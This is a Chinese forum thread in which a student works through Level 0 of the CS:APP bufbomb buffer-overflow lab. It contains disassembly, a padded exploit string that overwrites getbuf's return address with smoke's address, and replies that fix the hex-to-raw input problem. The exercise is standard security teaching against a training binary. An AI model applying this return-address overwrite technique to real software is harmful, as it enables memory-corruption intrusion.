21,458
社区成员
发帖
与我相关
我的任务
分享csapp 深入理解计算机系统lab3 缓冲区攻击
Level 0: Candle (10 pts)
The function getbuf is called within BUFBOMB by a function test having the following C code:
1 void test()
2 {
3 int val;
4 volatile int local = 0xdeadbeef;
5 entry_check(3); /* Make sure entered this function properly */
6 val = getbuf();
7 /* Check for corrupted stack */
8 if (local != 0xdeadbeef) {
9 printf("Sabotaged!: the stack has been corrupted\n");
10 }
11 else if (val == cookie) {
12 printf("Boom!: getbuf returned 0x%x\n", val);
13 validate(3);
14 }
15 else {
16 printf("Dud: getbuf returned 0x%x\n", val);
17 }
18 }
When getbuf executes its return statement (line 5 of getbuf), the program ordinarily resumes execution within function test (at line 8 of this function). Within the file bufbomb, there is a function smoke having the following C code:
void smoke()
{
entry_check(0); /* Make sure entered this function properly */
printf("Smoke!: You called smoke()\n");
validate(0);
exit(0);
}
Your task is to get BUFBOMB to execute the code for smoke when getbuf executes its return statement, rather than returning to test. You can do this by supplying an exploit string that overwrites the stored return pointer in the stack frame for getbuf with the address of the first instruction in smoke. Note that your exploit string may also corrupt other parts of the stack state, but this will not cause a problem, since smoke causes the program to exit directly.
Some Advice:
All the information you need to devise your exploit string for this level can be determined by examining a diassembled version of BUFBOMB.
Be careful about byte ordering.
You might want to use GDB to step the program through the last few instructions of getbuf to make sure it is doing the right thing.
The placement of buf within the stack frame for getbuf depends on which version of GCC was used to compile bufbomb. You will need to pad the beginning of your exploit string with the proper number of bytes to overwrite the return pointer. The values of these bytes can be arbitrary.
可以看到:Your task is to get BUFBOMB to execute the code for smoke when getbuf executes its return statement, rather than returning to test.
任务是把getbuf函数返回的地址改为smoke的地址。
getbuf函数的反汇编代码:
0x08048ad0 <+0>: push %ebp
0x08048ad1 <+1>: mov %esp,%ebp
0x08048ad3 <+3>: sub $0x28,%esp
0x08048ad6 <+6>: lea -0x18(%ebp),%eax
0x08048ad9 <+9>: mov %eax,(%esp)
0x08048adc <+12>: call 0x80489c0 <Gets>
0x08048ae1 <+17>: leave
0x08048ae2 <+18>: mov $0x1,%eax
0x08048ae7 <+23>: ret
可以看到buff存放在返回地址的4+0x18=0x1c处,其十进制是28则要在输入填充28个数,后接smoke的地址
smoke反汇编:
Dump of assembler code for function smoke:
0x08048eb0 <+0>: push %ebp
0x08048eb1 <+1>: mov %esp,%ebp
0x08048eb3 <+3>: sub $0x8,%esp
0x08048eb6 <+6>: movl $0x80495f7,(%esp)
0x08048ebd <+13>: call 0x8048758 <puts@plt>
0x08048ec2 <+18>: movl $0x0,(%esp)
0x08048ec9 <+25>: call 0x8048af0 <validate>
0x08048ece <+30>: movl $0x0,(%esp)
0x08048ed5 <+37>: call 0x80487e8 <exit@plt>
smoke地址08048eb0,因为是小端机器
所以填入
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 b0 8e 04 08
然而怎么都不对,输出
run -t wu<text.txt
Starting program: /home/zawdcxs/Desktop/bufbomb -t wu<text.txt
Team: wu
Cookie: 0x706f2ba4
Program received signal SIGSEGV, Segmentation fault.
0x30302030 in ?? ()
折腾好久还是没弄明白哪里有问题
The function getbuf is called within BUFBOMB by a function test having the following C code:
1 void test()
2 {
3 int val;
4 volatile int local = 0xdeadbeef;
5 entry_check(3); /* Make sure entered this function properly */
6 val = getbuf();
7 /* Check for corrupted stack */
8 if (local != 0xdeadbeef) {
9 printf("Sabotaged!: the stack has been corrupted\n");
10 }
11 else if (val == cookie) {
12 printf("Boom!: getbuf returned 0x%x\n", val);
13 validate(3);
14 }
15 else {
16 printf("Dud: getbuf returned 0x%x\n", val);
17 }
18 }
When getbuf executes its return statement (line 5 of getbuf), the program ordinarily resumes execution within function test (at line 8 of this function). Within the file bufbomb, there is a function smoke having the following C code:
void smoke()
{
entry_check(0); /* Make sure entered this function properly */
printf("Smoke!: You called smoke()\n");
validate(0);
exit(0);
}
Your task is to get BUFBOMB to execute the code for smoke when getbuf executes its return statement, rather than returning to test. You can do this by supplying an exploit string that overwrites the stored return pointer in the stack frame for getbuf with the address of the first instruction in smoke. Note that your exploit string may also corrupt other parts of the stack state, but this will not cause a problem, since smoke causes the program to exit directly.
Some Advice:
All the information you need to devise your exploit string for this level can be determined by examining a diassembled version of BUFBOMB.
Be careful about byte ordering.
You might want to use GDB to step the program through the last few instructions of getbuf to make sure it is doing the right thing.
The placement of buf within the stack frame for getbuf depends on which version of GCC was used to compile bufbomb. You will need to pad the beginning of your exploit string with the proper number of bytes to overwrite the return pointer. The values of these bytes can be arbitrary.
可以看到:Your task is to get BUFBOMB to execute the code for smoke when getbuf executes its return statement, rather than returning to test.
任务是把getbuf函数返回的地址改为smoke的地址。
getbuf函数的反汇编代码:
0x08048ad0 <+0>: push %ebp
0x08048ad1 <+1>: mov %esp,%ebp
0x08048ad3 <+3>: sub $0x28,%esp
0x08048ad6 <+6>: lea -0x18(%ebp),%eax
0x08048ad9 <+9>: mov %eax,(%esp)
0x08048adc <+12>: call 0x80489c0 <Gets>
0x08048ae1 <+17>: leave
0x08048ae2 <+18>: mov $0x1,%eax
0x08048ae7 <+23>: ret
可以看到buff存放在返回地址的4+0x18=0x1c处,其十进制是28则要在输入填充28个数,后接smoke的地址
smoke反汇编:
Dump of assembler code for function smoke:
0x08048eb0 <+0>: push %ebp
0x08048eb1 <+1>: mov %esp,%ebp
0x08048eb3 <+3>: sub $0x8,%esp
0x08048eb6 <+6>: movl $0x80495f7,(%esp)
0x08048ebd <+13>: call 0x8048758 <puts@plt>
0x08048ec2 <+18>: movl $0x0,(%esp)
0x08048ec9 <+25>: call 0x8048af0 <validate>
0x08048ece <+30>: movl $0x0,(%esp)
0x08048ed5 <+37>: call 0x80487e8 <exit@plt>
smoke地址08048eb0,因为是小端机器
所以填入
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 b0 8e 04 08
然而怎么都不对,输出
run -t wu<text.txt
Starting program: /home/zawdcxs/Desktop/bufbomb -t wu<text.txt
Team: wu
Cookie: 0x706f2ba4
Program received signal SIGSEGV, Segmentation fault.
0x30302030 in ?? ()
折腾好久还是没弄明白哪里有问题
...全文
请发表友善的回复…
发表回复
日立奔腾浪潮微软松下联想 2017-03-13
- 打赏
- 举报
原来他有工具啊,不过这种小程序自己写也很简单,就是atoi()或者strtol()/strtoul()。
zawdcxsa 2017-03-13
- 打赏
- 举报
有这么一个文件SENDSTRING: A utility to help convert between string formats.作用是把十六进制转换成字符串】
1. You can set up a series of pipes to pass the string through SENDSTRING.
unix> cat exploit.txt | ./sendstring | ./bufbomb -t bovik
2. You can store the raw string in a file and use I/O redirection to supply it to BUFBOMB:
unix> ./sendstring < exploit.txt > exploit-raw.txt
//我用这一局把16进制文本00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 b0 8e 04 08 就是text.txt转换成了对应的字符串格式文本text-raw.txt
unix> ./bufbomb -t bovik < exploit-raw.txt
This approach can also be used when running BUFBOMB from within GDB:
unix> gdb bufbomb
(gdb) run -t bovik < exploit-raw.txt
原始二进制文件:
这是得到的字符串:
控制台把text-raw.txt给bufbomb:
you called smoke!
日立奔腾浪潮微软松下联想 2017-03-13
- 打赏
- 举报
建一个文件,内容无所谓。保证大小至少30字节就可以,然后用hex编辑器,比如ultraedit打开这个文件,转换为hex编辑状态,从偏移0开始把那28个字节填进去,之后填入0d 0a,保存。
zawdcxsa 2017-03-13
- 打赏
- 举报
搞定了、!!!!!哈哈哈哈h
zawdcxsa 2017-03-13
- 打赏
- 举报
那要怎么写?
日立奔腾浪潮微软松下联想 2017-03-13
- 打赏
- 举报
你这样写在文本文件中
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 b0 8e 04 08
输出给程序是不行的
程序会认为读进来的是30 30 20 30 30 20...这样的一系列字符
